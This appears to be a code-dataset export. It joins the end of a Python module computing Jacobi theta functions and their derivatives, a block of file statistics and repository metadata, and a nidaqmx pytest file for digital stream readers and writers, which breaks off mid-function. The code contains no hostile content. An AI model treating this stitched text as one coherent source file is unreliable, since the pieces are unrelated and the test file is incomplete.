        while are**2 + aim**2 > MIN:
            bre, bim = (bre * x2re - bim * x2im) >> wp, \
                       (bre * x2im + bim * x2re) >> wp
            are, aim = (are * bre - aim * bim) >> wp, \
                       (are * bim + aim * bre) >> wp
            cn, sn = (cn*c1 - sn*s1) >> wp, (sn*c1 + cn*s1) >> wp
            if nd&1:
                sre += (are * sn * n**nd) >> wp
                sim += (aim * sn * n**nd) >> wp
            else:
                sre += (are * cn * n**nd) >> wp
                sim += (aim * cn * n**nd) >> wp
            n += 1
        sre = -(sre << (nd+1))
        sim = -(sim << (nd+1))
        sre = ctx.ldexp(sre, -wp)
        sim = ctx.ldexp(sim, -wp)
        s = ctx.mpc(sre, sim)
    #case z complex, q real
    elif not ctx._im(q):
        wp = ctx.prec + extra2
        x = ctx.to_fixed(ctx._re(q), wp)
        a = b = x
        x2 = (x*x) >> wp
        # temporarily raise the working precision for the complex cos/sin
        prec0 = ctx.prec
        ctx.prec = wp
        c1, s1 = ctx.cos_sin(2*z)
        ctx.prec = prec0
        cnre = c1re = ctx.to_fixed(ctx._re(c1), wp)
        cnim = c1im = ctx.to_fixed(ctx._im(c1), wp)
        snre = s1re = ctx.to_fixed(ctx._re(s1), wp)
        snim = s1im = ctx.to_fixed(ctx._im(s1), wp)
        if (nd&1):
            sre = (a * snre) >> wp
            sim = (a * snim) >> wp
        else:
            sre = (a * cnre) >> wp
            sim = (a * cnim) >> wp
        n = 2
        while abs(a) > MIN:
            b = (b*x2) >> wp
            a = (a*b) >> wp
            t1 = (cnre*c1re - cnim*c1im - snre*s1re + snim*s1im) >> wp
            t2 = (cnre*c1im + cnim*c1re - snre*s1im - snim*s1re) >> wp
            t3 = (snre*c1re - snim*c1im + cnre*s1re - cnim*s1im) >> wp
            t4 = (snre*c1im + snim*c1re + cnre*s1im + cnim*s1re) >> wp
            cnre = t1
            cnim = t2
            snre = t3
            snim = t4
            if (nd&1):
                sre += (a * snre * n**nd) >> wp
                sim += (a * snim * n**nd) >> wp
            else:
                sre += (a * cnre * n**nd) >> wp
                sim += (a * cnim * n**nd) >> wp
            n += 1
        sre = -(sre << (nd+1))
        sim = -(sim << (nd+1))
        sre = ctx.ldexp(sre, -wp)
        sim = ctx.ldexp(sim, -wp)
        s = ctx.mpc(sre, sim)
    # case z and q complex
    else:
        wp = ctx.prec + extra2
        xre = ctx.to_fixed(ctx._re(q), wp)
        xim = ctx.to_fixed(ctx._im(q), wp)
        x2re = (xre*xre - xim*xim) >> wp
        x2im = (xre*xim) >> (wp - 1)
        are = bre = xre
        aim = bim = xim
        prec0 = ctx.prec
        ctx.prec = wp
        # cos(2*z), sin(2*z) with z complex
        c1, s1 = ctx.cos_sin(2*z)
        ctx.prec = prec0
        cnre = c1re = ctx.to_fixed(ctx._re(c1), wp)
        cnim = c1im = ctx.to_fixed(ctx._im(c1), wp)
        snre = s1re = ctx.to_fixed(ctx._re(s1), wp)
        snim = s1im = ctx.to_fixed(ctx._im(s1), wp)
        if (nd&1):
            sre = (are * snre - aim * snim) >> wp
            sim = (aim * snre + are * snim) >> wp
        else:
            sre = (are * cnre - aim * cnim) >> wp
            sim = (aim * cnre + are * cnim) >> wp
        n = 2
        while are**2 + aim**2 > MIN:
            bre, bim = (bre * x2re - bim * x2im) >> wp, \
                       (bre * x2im + bim * x2re) >> wp
            are, aim = (are * bre - aim * bim) >> wp, \
                       (are * bim + aim * bre) >> wp
            t1 = (cnre*c1re - cnim*c1im - snre*s1re + snim*s1im) >> wp
            t2 = (cnre*c1im + cnim*c1re - snre*s1im - snim*s1re) >> wp
            t3 = (snre*c1re - snim*c1im + cnre*s1re - cnim*s1im) >> wp
            t4 = (snre*c1im + snim*c1re + cnre*s1im + cnim*s1re) >> wp
            cnre = t1
            cnim = t2
            snre = t3
            snim = t4
            if(nd&1):
                sre += ((are * snre - aim * snim) * n**nd) >> wp
                sim += ((aim * snre + are * snim) * n**nd) >> wp
            else:
                sre += ((are * cnre - aim * cnim) * n**nd) >> wp
                sim += ((aim * cnre + are * cnim) * n**nd) >> wp
            n += 1
        sre = -(sre << (nd+1))
        sim = -(sim << (nd+1))
        sre = ctx.ldexp(sre, -wp)
        sim = ctx.ldexp(sim, -wp)
        s = ctx.mpc(sre, sim)
    # sign fixed by the derivative order
    if (nd&1):
        return (-1)**(nd//2) * s
    else:
        return (-1)**(1 + nd//2) * s
@defun
def _jacobi_theta2a(ctx, z, q):
    """
    Series for theta(2, z, q) in the case ctx._im(z) != 0.

    theta(2, z, q) =
        q**(1/4) * Sum(q**(n*n + n) * exp(j*(2*n + 1)*z), n = -inf..inf)

    The summation starts at n0 = int(ctx._im(z)/log(q).real - 1/2), the
    index near which the terms are largest, and proceeds in both
    directions until the terms fall below eps1, which is scaled from the
    leading term.
    """
    n0 = int(ctx._im(z)/ctx._re(ctx.log(q)) - 1/2)
    e0 = ctx.expj((2*n0 + 1)*z)
    # Leading term fixes the truncation threshold.
    leading = q**(n0*n0 + n0) * e0
    total = leading
    eps1 = ctx.eps*abs(leading)
    # Sum upwards from n0 + 1; each step multiplies by exp(2jz).
    up = ctx.expj(2*z)
    e = e0
    k = n0
    while True:
        k += 1
        e = e * up
        term = q**(k*k + k) * e
        if abs(term) < eps1:
            break
        total += term
    # Sum downwards from n0 - 1; each step multiplies by exp(-2jz).
    down = ctx.expj(-2*z)
    e = e0
    k = n0
    while True:
        k -= 1
        e = e * down
        term = q**(k*k + k) * e
        if abs(term) < eps1:
            break
        total += term
    return total * ctx.nthroot(q, 4)
@defun
def _jacobi_theta3a(ctx, z, q):
    """
    Series for theta3(z, q) in the case ctx._im(z) != 0.

    theta3(z, q) = Sum(q**(n*n) * exp(j*2*n*z), n = -inf..inf)

    The summation starts at n0 = int(-ctx._im(z)/abs(log(q).real)), the
    index near which the terms are largest, and proceeds in both
    directions until the terms fall below eps1, which is scaled from the
    leading term.
    """
    n0 = int(-ctx._im(z)/abs(ctx._re(ctx.log(q))))
    e0 = ctx.expj(2*n0*z)
    # Leading term fixes the truncation threshold.
    leading = q**(n0*n0) * e0
    total = leading
    eps1 = ctx.eps*abs(leading)
    # Sum upwards from n0 + 1; each step multiplies by exp(2jz).
    up = ctx.expj(2*z)
    e = e0
    k = n0
    while True:
        k += 1
        e = e * up
        term = q**(k*k) * e
        if abs(term) < eps1:
            break
        total += term
    # Sum downwards from n0 - 1; each step multiplies by exp(-2jz).
    down = ctx.expj(-2*z)
    e = e0
    k = n0
    while True:
        k -= 1
        e = e * down
        term = q**(k*k) * e
        if abs(term) < eps1:
            break
        total += term
    return total
@defun
def _djacobi_theta2a(ctx, z, q, nd):
    """
    nd-th derivative series for theta(2, z, q) in the case
    ctx._im(z) != 0.

    dtheta(2, z, q, nd) =
        j**nd * q**(1/4) *
        Sum((2*n+1)**nd * q**(n*n + n) * exp(j*(2*n + 1)*z), n=-inf..inf)

    The summation starts at n0 = int(ctx._im(z)/log(q).real - 1/2), the
    index near which the terms are largest, and proceeds in both
    directions until the terms fall below eps1, which is scaled from the
    leading term.
    """
    n0 = int(ctx._im(z)/ctx._re(ctx.log(q)) - 1/2)
    e0 = ctx.expj((2*n0 + 1)*z)
    # Leading term fixes the truncation threshold.
    leading = (2*n0+1)**nd * q**(n0*n0 + n0) * e0
    total = leading
    eps1 = ctx.eps*abs(leading)
    # Sum upwards from n0 + 1; each step multiplies by exp(2jz).
    up = ctx.expj(2*z)
    e = e0
    k = n0
    while True:
        k += 1
        e = e * up
        term = (2*k+1)**nd * q**(k*k + k) * e
        if abs(term) < eps1:
            break
        total += term
    # Sum downwards from n0 - 1; each step multiplies by exp(-2jz).
    down = ctx.expj(-2*z)
    e = e0
    k = n0
    while True:
        k -= 1
        e = e * down
        term = (2*k+1)**nd * q**(k*k + k) * e
        if abs(term) < eps1:
            break
        total += term
    return ctx.j**nd * total * ctx.nthroot(q, 4)
@defun
def _djacobi_theta3a(ctx, z, q, nd):
    """
    case ctx._im(z) != 0
    djtheta3(z, q, nd) = (2*j)**nd *
      Sum(q**(n*n) * n**nd * exp(j*2*n*z), n, -inf, inf)
    max term for minimum n*abs(log(q).real) + ctx._im(z)
    """
    # Start at n0, the index near which the series terms are largest.
    n = n0 = int(-ctx._im(z)/abs(ctx._re(ctx.log(q))))
    e2 = ctx.expj(2*z)
    e = e0 = ctx.expj(2*n*z)
    a = q**(n*n) * e
    s = term = n**nd * a
    # At n == 0 the factor n**nd makes the term vanish (for nd >= 1), so
    # base the truncation threshold on the undifferentiated factor a
    # instead of on the (zero) term.
    if n != 0:
        eps1 = ctx.eps*abs(term)
    else:
        eps1 = ctx.eps*abs(a)
    # Sum upwards from n0 + 1; each step multiplies e by exp(2jz).
    while 1:
        n += 1
        e = e * e2
        a = q**(n*n) * e
        term = n**nd * a
        # When n crosses 0 the term vanishes; judge convergence on
        # abs(a) there so the loop is not terminated prematurely.
        if n != 0:
            aterm = abs(term)
        else:
            aterm = abs(a)
        if aterm < eps1:
            break
        s += term
    # Sum downwards from n0 - 1, restarting from e0 and stepping with
    # exp(-2jz).
    e = e0
    e2 = ctx.expj(-2*z)
    n = n0
    while 1:
        n -= 1
        e = e * e2
        a = q**(n*n) * e
        term = n**nd * a
        if n != 0:
            aterm = abs(term)
        else:
            aterm = abs(a)
        if aterm < eps1:
            break
        s += term
    return (2*ctx.j)**nd * s
@defun
def jtheta(ctx, n, z, q, derivative=0):
    """
    Evaluate the Jacobi theta function theta(n, z, q) for n in 1..4,
    or its derivative of the given order when ``derivative`` > 0.

    Implementation note: when ctx._im(z) is close to zero the
    fixed-point series _jacobi_theta2/_jacobi_theta3 (summed from n=0)
    are used; otherwise _jacobi_theta2a/_jacobi_theta3a are used, which
    start the summation at the index of the largest term.
    Raises ValueError if abs(q) exceeds ctx.THETA_Q_LIM or n is not
    in 1..4.
    """
    if derivative:
        return ctx._djtheta(n, z, q, derivative)

    z = ctx.convert(z)
    q = ctx.convert(q)
    if abs(q) > ctx.THETA_Q_LIM:
        raise ValueError('abs(q) > THETA_Q_LIM = %f' % ctx.THETA_Q_LIM)
    # Extra working precision; enlarged when z is very large, or very
    # small in the n == 1 case.
    extra = 10
    if z:
        M = ctx.mag(z)
        if M > 5 or (n == 1 and M < -5):
            extra += 2*abs(M)
    cz = 0.5
    extra2 = 50
    prec0 = ctx.prec
    try:
        ctx.prec += extra
        if n not in (1, 2, 3, 4):
            raise ValueError
        # theta1 is theta2 evaluated at z - pi/2; theta4 is theta3 with
        # the nome negated.
        shifted = (n == 1)
        qq = -q if n == 4 else q
        if n in (1, 2):
            f_fixed, f_series = ctx._jacobi_theta2, ctx._jacobi_theta2a
        else:
            f_fixed, f_series = ctx._jacobi_theta3, ctx._jacobi_theta3a
        # The argument shift z - pi/2 is computed inside each branch so
        # that pi is evaluated at that branch's working precision.
        if ctx._im(z):
            if abs(ctx._im(z)) < cz * abs(ctx._re(ctx.log(q))):
                ctx.dps += extra2
                w = z - ctx.pi/2 if shifted else z
                res = f_fixed(w, qq)
            else:
                ctx.dps += 10
                w = z - ctx.pi/2 if shifted else z
                res = f_series(w, qq)
        else:
            w = z - ctx.pi/2 if shifted else z
            res = f_fixed(w, qq)
    finally:
        ctx.prec = prec0
    return res
@defun
def _djtheta(ctx, n, z, q, derivative=1):
    """
    Evaluate the nd-th derivative of theta(n, z, q), nd = derivative.

    Mirrors jtheta's selection logic: fixed-point series when
    ctx._im(z) is small, shifted-start series otherwise.
    Raises ValueError if abs(q) exceeds ctx.THETA_Q_LIM or n is not
    in 1..4.
    """
    z = ctx.convert(z)
    q = ctx.convert(q)
    nd = int(derivative)

    if abs(q) > ctx.THETA_Q_LIM:
        raise ValueError('abs(q) > THETA_Q_LIM = %f' % ctx.THETA_Q_LIM)
    # Extra precision grows with the derivative order.
    extra = 10 + ctx.prec * nd // 10
    if z:
        M = ctx.mag(z)
        if M > 5 or (n != 1 and M < -5):
            extra += 2*abs(M)
    cz = 0.5
    extra2 = 50
    prec0 = ctx.prec
    try:
        ctx.prec += extra
        if n not in (1, 2, 3, 4):
            raise ValueError
        # theta1' comes from theta2' at z - pi/2; theta4' from theta3'
        # with the nome negated.
        shifted = (n == 1)
        qq = -q if n == 4 else q
        if n in (1, 2):
            f_fixed, f_series = ctx._djacobi_theta2, ctx._djacobi_theta2a
        else:
            f_fixed, f_series = ctx._djacobi_theta3, ctx._djacobi_theta3a
        # The argument shift z - pi/2 is computed inside each branch so
        # that pi is evaluated at that branch's working precision.
        if ctx._im(z):
            if abs(ctx._im(z)) < cz * abs(ctx._re(ctx.log(q))):
                ctx.dps += extra2
                w = z - ctx.pi/2 if shifted else z
                res = f_fixed(w, qq, nd)
            else:
                ctx.dps += 10
                w = z - ctx.pi/2 if shifted else z
                res = f_series(w, qq, nd)
        else:
            w = z - ctx.pi/2 if shifted else z
            res = f_fixed(w, qq, nd)
    finally:
        ctx.prec = prec0
    return +res
| 35.542857
| 76
| 0.395257
| 5,255
| 37,320
| 2.746717
| 0.03216
| 0.02702
| 0.054039
| 0.05584
| 0.940973
| 0.917348
| 0.905917
| 0.890813
| 0.87183
| 0.850215
| 0
| 0.059624
| 0.440943
| 37,320
| 1,049
| 77
| 35.57674
| 0.632189
| 0.059995
| 0
| 0.875519
| 0
| 0
| 0.001432
| 0
| 0
| 0
| 0
| 0.000953
| 0
| 1
| 0.010373
| false
| 0
| 0.001037
| 0
| 0.03112
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2b47ec80f342fb81468e7e85a013531bbc6bf26d
| 26,340
|
py
|
Python
|
nidaqmx/tests/test_stream_digital_readers_writers.py
|
stafak/nidaqmx-python
|
f354d7971b21074c120c6f298dbbf4a5e0e4f4f4
|
[
"MIT"
] | 252
|
2017-03-22T02:43:16.000Z
|
2022-03-27T14:44:44.000Z
|
nidaqmx/tests/test_stream_digital_readers_writers.py
|
stafak/nidaqmx-python
|
f354d7971b21074c120c6f298dbbf4a5e0e4f4f4
|
[
"MIT"
] | 133
|
2017-03-21T20:57:59.000Z
|
2022-03-31T16:08:12.000Z
|
nidaqmx/tests/test_stream_digital_readers_writers.py
|
stafak/nidaqmx-python
|
f354d7971b21074c120c6f298dbbf4a5e0e4f4f4
|
[
"MIT"
] | 124
|
2017-04-01T18:35:24.000Z
|
2022-03-25T06:30:00.000Z
|
import numpy
import pytest
import random
import time
import nidaqmx
from nidaqmx.constants import (
LineGrouping)
from nidaqmx.stream_readers import (
DigitalSingleChannelReader, DigitalMultiChannelReader)
from nidaqmx.stream_writers import (
DigitalSingleChannelWriter, DigitalMultiChannelWriter)
from nidaqmx.tests.fixtures import x_series_device
from nidaqmx.tests.helpers import generate_random_seed
from nidaqmx.tests.test_read_write import TestDAQmxIOBase
from nidaqmx.utils import flatten_channel_string
class TestDigitalSingleChannelReaderWriter(TestDAQmxIOBase):
    """
    Contains a collection of pytest tests that validate the digital single
    channel readers and writers in the NI-DAQmx Python API.

    These tests use only a single X Series device by both writing to and
    reading from ONLY the digital output lines.
    """

    @pytest.mark.parametrize('seed', [generate_random_seed()])
    def test_one_sample_one_line(self, x_series_device, seed):
        """Round-trip single boolean samples through one digital line."""
        # Reset the pseudorandom number generator with seed.
        random.seed(seed)

        do_line = random.choice(x_series_device.do_lines).name

        with nidaqmx.Task() as task:
            task.do_channels.add_do_chan(
                do_line, line_grouping=LineGrouping.CHAN_PER_LINE)

            writer = DigitalSingleChannelWriter(task.out_stream)
            reader = DigitalSingleChannelReader(task.in_stream)

            # Generate random values to test.
            values_to_test = [bool(random.getrandbits(1)) for _ in range(10)]

            values_read = []
            for value_to_test in values_to_test:
                writer.write_one_sample_one_line(value_to_test)
                time.sleep(0.001)
                values_read.append(reader.read_one_sample_one_line())

            numpy.testing.assert_array_equal(values_read, values_to_test)

    @pytest.mark.parametrize('seed', [generate_random_seed()])
    def test_one_sample_multi_line(self, x_series_device, seed):
        """Round-trip one multi-line boolean sample through one channel."""
        # Reset the pseudorandom number generator with seed.
        random.seed(seed)

        number_of_lines = random.randint(2, len(x_series_device.do_lines))
        do_lines = random.sample(x_series_device.do_lines, number_of_lines)

        with nidaqmx.Task() as task:
            task.do_channels.add_do_chan(
                flatten_channel_string([d.name for d in do_lines]),
                line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)

            writer = DigitalSingleChannelWriter(task.out_stream)
            reader = DigitalSingleChannelReader(task.in_stream)

            # Generate random values to test.
            values_to_test = numpy.array(
                [bool(random.getrandbits(1)) for _ in
                 range(number_of_lines)])

            writer.write_one_sample_multi_line(values_to_test)
            time.sleep(0.001)

            # numpy.bool was removed in NumPy 1.24; the builtin bool is
            # the supported equivalent dtype.
            values_read = numpy.zeros(number_of_lines, dtype=bool)
            reader.read_one_sample_multi_line(values_read)

            numpy.testing.assert_array_equal(values_read, values_to_test)

    @pytest.mark.skipif(
        not any([d.do_port_width <= 8 for d in x_series_device().do_ports]),
        reason="Requires digital port with at most 8 lines.")
    @pytest.mark.parametrize('seed', [generate_random_seed()])
    def test_one_sample_port_byte(self, x_series_device, seed):
        """Round-trip single byte-wide port samples."""
        # Reset the pseudorandom number generator with seed.
        random.seed(seed)

        do_port = random.choice(
            [d for d in x_series_device.do_ports if d.do_port_width <= 8])

        with nidaqmx.Task() as task:
            task.do_channels.add_do_chan(
                do_port.name, line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)

            # Generate random values to test.
            values_to_test = [int(random.getrandbits(do_port.do_port_width))
                              for _ in range(10)]

            writer = DigitalSingleChannelWriter(task.out_stream)
            reader = DigitalSingleChannelReader(task.in_stream)

            values_read = []
            for value_to_test in values_to_test:
                writer.write_one_sample_port_byte(value_to_test)
                time.sleep(0.001)
                values_read.append(reader.read_one_sample_port_byte())

            numpy.testing.assert_array_equal(values_read, values_to_test)

    @pytest.mark.skipif(
        not any([d.do_port_width <= 16 for d in x_series_device().do_ports]),
        reason="Requires digital port with at most 16 lines.")
    @pytest.mark.parametrize('seed', [generate_random_seed()])
    def test_one_sample_port_uint16(self, x_series_device, seed):
        """Round-trip single uint16-wide port samples."""
        # Reset the pseudorandom number generator with seed.
        random.seed(seed)

        do_port = random.choice(
            [do for do in x_series_device.do_ports if do.do_port_width <= 16])

        with nidaqmx.Task() as task:
            task.do_channels.add_do_chan(
                do_port.name, line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)

            # Generate random values to test.
            values_to_test = [int(random.getrandbits(do_port.do_port_width))
                              for _ in range(10)]

            writer = DigitalSingleChannelWriter(task.out_stream)
            reader = DigitalSingleChannelReader(task.in_stream)

            values_read = []
            for value_to_test in values_to_test:
                writer.write_one_sample_port_uint16(value_to_test)
                time.sleep(0.001)
                values_read.append(reader.read_one_sample_port_uint16())

            numpy.testing.assert_array_equal(values_read, values_to_test)

    @pytest.mark.skipif(
        not any([d.do_port_width <= 32 for d in x_series_device().do_ports]),
        reason="Requires digital port with at most 32 lines.")
    @pytest.mark.parametrize('seed', [generate_random_seed()])
    def test_one_sample_port_uint32(self, x_series_device, seed):
        """Round-trip single uint32-wide port samples."""
        # Reset the pseudorandom number generator with seed.
        random.seed(seed)

        do_port = random.choice(
            [do for do in x_series_device.do_ports if do.do_port_width <= 32])

        with nidaqmx.Task() as task:
            task.do_channels.add_do_chan(
                do_port.name, line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)

            # Generate random values to test.
            values_to_test = [int(random.getrandbits(do_port.do_port_width))
                              for _ in range(10)]

            writer = DigitalSingleChannelWriter(task.out_stream)
            reader = DigitalSingleChannelReader(task.in_stream)

            values_read = []
            for value_to_test in values_to_test:
                writer.write_one_sample_port_uint32(value_to_test)
                time.sleep(0.001)
                values_read.append(reader.read_one_sample_port_uint32())

            numpy.testing.assert_array_equal(values_read, values_to_test)

    @pytest.mark.skipif(
        not any([d.do_port_width <= 8 for d in x_series_device().do_ports]),
        reason="Requires digital port with at most 8 lines.")
    @pytest.mark.parametrize('seed', [generate_random_seed()])
    def test_many_sample_port_byte(self, x_series_device, seed):
        """Stream many byte-wide port samples and read them back."""
        # Reset the pseudorandom number generator with seed.
        random.seed(seed)

        number_of_samples = random.randint(2, 20)
        do_port = random.choice(
            [d for d in x_series_device.do_ports if d.do_port_width <= 8])

        with nidaqmx.Task() as task:
            task.do_channels.add_do_chan(
                do_port.name, line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)

            # Generate random values to test.
            values_to_test = numpy.array(
                [int(random.getrandbits(do_port.do_port_width))
                 for _ in range(number_of_samples)], dtype=numpy.uint8)

            writer = DigitalSingleChannelWriter(task.out_stream)
            reader = DigitalSingleChannelReader(task.in_stream)
            task.start()

            writer.write_many_sample_port_byte(values_to_test)
            time.sleep(0.001)

            # Since we're writing to and reading from ONLY the digital
            # output lines, we can't use sample clocks to correlate the
            # read and write sampling times. Thus, we essentially read
            # the last value written multiple times.
            values_read = numpy.zeros(number_of_samples, dtype=numpy.uint8)
            reader.read_many_sample_port_byte(
                values_read, number_of_samples_per_channel=number_of_samples)

            expected_values = [
                values_to_test[-1] for _ in range(number_of_samples)]
            numpy.testing.assert_array_equal(values_read, expected_values)

    @pytest.mark.skipif(
        not any([d.do_port_width <= 16 for d in x_series_device().do_ports]),
        reason="Requires digital port with at most 16 lines.")
    @pytest.mark.parametrize('seed', [generate_random_seed()])
    def test_many_sample_port_uint16(self, x_series_device, seed):
        """Stream many uint16-wide port samples and read them back."""
        # Reset the pseudorandom number generator with seed.
        random.seed(seed)

        number_of_samples = random.randint(2, 20)
        do_port = random.choice(
            [d for d in x_series_device.do_ports if d.do_port_width <= 16])

        with nidaqmx.Task() as task:
            task.do_channels.add_do_chan(
                do_port.name, line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)

            # Generate random values to test.
            values_to_test = numpy.array(
                [int(random.getrandbits(do_port.do_port_width))
                 for _ in range(number_of_samples)], dtype=numpy.uint16)

            writer = DigitalSingleChannelWriter(task.out_stream)
            reader = DigitalSingleChannelReader(task.in_stream)
            task.start()

            writer.write_many_sample_port_uint16(values_to_test)
            time.sleep(0.001)

            # Since we're writing to and reading from ONLY the digital
            # output lines, we can't use sample clocks to correlate the
            # read and write sampling times. Thus, we essentially read
            # the last value written multiple times.
            values_read = numpy.zeros(number_of_samples, dtype=numpy.uint16)
            reader.read_many_sample_port_uint16(
                values_read, number_of_samples_per_channel=number_of_samples)

            expected_values = [
                values_to_test[-1] for _ in range(number_of_samples)]
            numpy.testing.assert_array_equal(values_read, expected_values)

    @pytest.mark.skipif(
        not any([d.do_port_width <= 32 for d in x_series_device().do_ports]),
        reason="Requires digital port with at most 32 lines.")
    @pytest.mark.parametrize('seed', [generate_random_seed()])
    def test_many_sample_port_uint32(self, x_series_device, seed):
        """Stream many uint32-wide port samples and read them back."""
        # Reset the pseudorandom number generator with seed.
        random.seed(seed)

        number_of_samples = random.randint(2, 20)
        do_port = random.choice(
            [d for d in x_series_device.do_ports if d.do_port_width <= 32])

        with nidaqmx.Task() as task:
            task.do_channels.add_do_chan(
                do_port.name, line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)

            # Generate random values to test.
            values_to_test = numpy.array(
                [int(random.getrandbits(do_port.do_port_width))
                 for _ in range(number_of_samples)], dtype=numpy.uint32)

            writer = DigitalSingleChannelWriter(task.out_stream)
            reader = DigitalSingleChannelReader(task.in_stream)
            task.start()

            writer.write_many_sample_port_uint32(values_to_test)
            time.sleep(0.001)

            # Since we're writing to and reading from ONLY the digital
            # output lines, we can't use sample clocks to correlate the
            # read and write sampling times. Thus, we essentially read
            # the last value written multiple times.
            values_read = numpy.zeros(number_of_samples, dtype=numpy.uint32)
            reader.read_many_sample_port_uint32(
                values_read, number_of_samples_per_channel=number_of_samples)

            expected_values = [
                values_to_test[-1] for _ in range(number_of_samples)]
            numpy.testing.assert_array_equal(values_read, expected_values)
class TestDigitalMultiChannelReaderWriter(TestDAQmxIOBase):
    """
    Contains a collection of pytest tests that validate the digital multi
    channel readers and writers in the NI-DAQmx Python API.

    These tests use only a single X Series device by utilizing the internal
    loopback routes on the device.
    """

    @pytest.mark.parametrize('seed', [generate_random_seed()])
    def test_one_sample_one_line(self, x_series_device, seed):
        """Round-trip one boolean sample across multiple one-line channels."""
        # Reset the pseudorandom number generator with seed.
        random.seed(seed)

        number_of_channels = random.randint(2, len(x_series_device.do_lines))
        do_lines = random.sample(x_series_device.do_lines, number_of_channels)

        with nidaqmx.Task() as task:
            task.do_channels.add_do_chan(
                flatten_channel_string([d.name for d in do_lines]),
                line_grouping=LineGrouping.CHAN_PER_LINE)

            writer = DigitalMultiChannelWriter(task.out_stream)
            reader = DigitalMultiChannelReader(task.in_stream)

            # Generate random values to test.
            values_to_test = numpy.array(
                [bool(random.getrandbits(1)) for _ in
                 range(number_of_channels)])

            writer.write_one_sample_one_line(values_to_test)
            time.sleep(0.001)

            # numpy.bool was removed in NumPy 1.24; the builtin bool is
            # the supported equivalent dtype.
            values_read = numpy.zeros(number_of_channels, dtype=bool)
            reader.read_one_sample_one_line(values_read)

            numpy.testing.assert_array_equal(values_read, values_to_test)

    @pytest.mark.parametrize('seed', [generate_random_seed()])
    def test_one_sample_multi_line(self, x_series_device, seed):
        """Round-trip one multi-line sample across multiple channels."""
        # Reset the pseudorandom number generator with seed.
        random.seed(seed)

        num_lines = random.randint(2, 4)
        # random.randint requires integer bounds; numpy.floor returns a
        # float, so convert explicitly.
        number_of_channels = random.randint(
            2, int(numpy.floor(len(x_series_device.do_lines) /
                               float(num_lines))))
        all_lines = random.sample(x_series_device.do_lines,
                                  num_lines * number_of_channels)

        with nidaqmx.Task() as task:
            for i in range(number_of_channels):
                do_lines = all_lines[i * num_lines:(i + 1) * num_lines]
                task.do_channels.add_do_chan(
                    flatten_channel_string([d.name for d in do_lines]),
                    line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)

            writer = DigitalMultiChannelWriter(task.out_stream)
            reader = DigitalMultiChannelReader(task.in_stream)

            # Generate random values to test.
            values_to_test = numpy.array(
                [[bool(random.getrandbits(1)) for _ in range(num_lines)]
                 for _ in range(number_of_channels)])

            writer.write_one_sample_multi_line(values_to_test)
            time.sleep(0.001)

            # numpy.bool was removed in NumPy 1.24; the builtin bool is
            # the supported equivalent dtype.
            values_read = numpy.zeros(
                (number_of_channels, num_lines), dtype=bool)
            reader.read_one_sample_multi_line(values_read)

            numpy.testing.assert_array_equal(values_read, values_to_test)

    # NOTE: the skip conditions below filter the ports by width before
    # counting; taking len() of a list of booleans would count every
    # port regardless of width, contradicting the stated reason.
    @pytest.mark.skipif(
        len([d for d in x_series_device().do_ports
             if d.do_port_width <= 8]) < 2,
        reason="Requires 2 digital ports with at most 8 lines.")
    @pytest.mark.parametrize('seed', [generate_random_seed()])
    def test_one_sample_port_byte(self, x_series_device, seed):
        """Round-trip one byte-wide sample across multiple ports."""
        # Reset the pseudorandom number generator with seed.
        random.seed(seed)

        all_ports = [d for d in x_series_device.do_ports if
                     d.do_port_width <= 8]
        number_of_channels = random.randint(2, len(all_ports))
        do_ports = random.sample(all_ports, number_of_channels)

        with nidaqmx.Task() as task:
            for do_port in do_ports:
                task.do_channels.add_do_chan(
                    do_port.name,
                    line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)

            # Generate random values to test.
            values_to_test = numpy.array(
                [int(random.getrandbits(d.do_port_width)) for d in do_ports],
                dtype=numpy.uint8)

            writer = DigitalMultiChannelWriter(task.out_stream)
            reader = DigitalMultiChannelReader(task.in_stream)

            writer.write_one_sample_port_byte(values_to_test)
            time.sleep(0.001)

            values_read = numpy.zeros(number_of_channels, dtype=numpy.uint8)
            reader.read_one_sample_port_byte(values_read)

            numpy.testing.assert_array_equal(values_read, values_to_test)

    @pytest.mark.skipif(
        len([d for d in x_series_device().do_ports
             if d.do_port_width <= 16]) < 2,
        reason="Requires 2 digital ports with at most 16 lines.")
    @pytest.mark.parametrize('seed', [generate_random_seed()])
    def test_one_sample_port_uint16(self, x_series_device, seed):
        """Round-trip one uint16-wide sample across multiple ports."""
        # Reset the pseudorandom number generator with seed.
        random.seed(seed)

        all_ports = [d for d in x_series_device.do_ports if
                     d.do_port_width <= 16]
        number_of_channels = random.randint(2, len(all_ports))
        do_ports = random.sample(all_ports, number_of_channels)

        with nidaqmx.Task() as task:
            for do_port in do_ports:
                task.do_channels.add_do_chan(
                    do_port.name,
                    line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)

            # Generate random values to test.
            values_to_test = numpy.array(
                [int(random.getrandbits(d.do_port_width)) for d in do_ports],
                dtype=numpy.uint16)

            writer = DigitalMultiChannelWriter(task.out_stream)
            reader = DigitalMultiChannelReader(task.in_stream)

            writer.write_one_sample_port_uint16(values_to_test)
            time.sleep(0.001)

            values_read = numpy.zeros(number_of_channels, dtype=numpy.uint16)
            reader.read_one_sample_port_uint16(values_read)

            numpy.testing.assert_array_equal(values_read, values_to_test)

    @pytest.mark.skipif(
        len([d for d in x_series_device().do_ports
             if d.do_port_width <= 32]) < 2,
        reason="Requires 2 digital ports with at most 32 lines.")
    @pytest.mark.parametrize('seed', [generate_random_seed()])
    def test_one_sample_port_uint32(self, x_series_device, seed):
        """Round-trip one uint32-wide sample across multiple ports."""
        # Reset the pseudorandom number generator with seed.
        random.seed(seed)

        all_ports = [d for d in x_series_device.do_ports if
                     d.do_port_width <= 32]
        number_of_channels = random.randint(2, len(all_ports))
        do_ports = random.sample(all_ports, number_of_channels)

        with nidaqmx.Task() as task:
            for do_port in do_ports:
                task.do_channels.add_do_chan(
                    do_port.name,
